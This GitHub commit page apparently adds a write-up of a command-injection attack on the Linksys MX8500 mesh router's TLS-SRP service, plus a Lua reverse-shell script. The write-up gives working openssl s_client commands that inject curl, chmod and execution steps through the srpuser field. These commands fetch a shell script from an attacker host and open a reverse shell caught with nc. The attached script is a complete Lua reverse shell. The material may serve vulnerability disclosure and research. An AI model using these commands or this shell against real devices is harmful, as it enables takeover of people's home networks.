-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
4 changed files
with
50 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,49 @@ | ||
| # Linksys Mesh Network Attack | ||
| ## Intro | ||
| In this write-up, we use Linksys MX8500, firmware version 1.0.11.208937 as an illustration example. | ||
|
|
||
| Linksys uses TLS-SRP as its NAPS protocol. The gateway node opens TCP port 6060 for this purpose. | ||
|
|
||
| We identify a command injection for the `srpuser` field: | ||
|
|
||
|  | ||
|
|
||
| Thus, the key to breaking this protocol is that an attacker can taint the `srpuser` field in a TLS-SRP connection, to contain malicious commands. | ||
|
|
||
| ## Attack Step 1: Prepare a reverse shell script | ||
|
|
||
| I used [Reverse Shell Generator](https://www.revshells.com/) to generate a lua reverse shell for MX8500. | ||
| Download my reverse shell [here](./luashell.sh), and you might want to change IP address and port number within this script to your own local machine's. | ||
|
|
||
| ## Attack Step 2: Use openssl s_client to attack the gateway node | ||
| Install openssl on your own local machine. | ||
|
|
||
| Host your lua shell prepared in Step 1 using this command: | ||
| ``` | ||
| python3 -m http.server 4444 | ||
| ``` | ||
|
|
||
| Run this command to let the gateway node (10.154.1.1) download the shell script from your local machine: | ||
|
|
||
| ``` | ||
| openssl s_client -srpuser "123| curl http://10.154.1.14:4444/luashell.sh -o /tmp/luashell.sh;" -srppass pass:xxxxxx -cipher SRP -connect 10.154.1.1:6060 | ||
| ``` | ||
|
|
||
| Run this command to let the gateway node chmod 777 the shell script: | ||
| ``` | ||
| openssl s_client -srpuser "123; chmod 777 /tmp/luashell.sh;" -srppass pass:xxxxxx -cipher SRP -connect 10.154.1.1:6060 | ||
| ``` | ||
|
|
||
| Run `nc` on your own local machine to listen to reverse shell connections: | ||
| ``` | ||
| nc -l 9002 | ||
| ``` | ||
|
|
||
| Finally, run this command to execute the shell script on the gateway node: | ||
| ``` | ||
| openssl s_client -srpuser "123| /tmp/luashell.sh;" -srppass pass:xxxxxx -cipher SRP -connect 10.154.1.1:6060 | ||
| ``` | ||
|
|
||
| We can see the result on the `nc` screen: | ||
|  | ||
|
|
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| /usr/bin/lua -e 'local host, port = "10.154.1.14", 9002 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.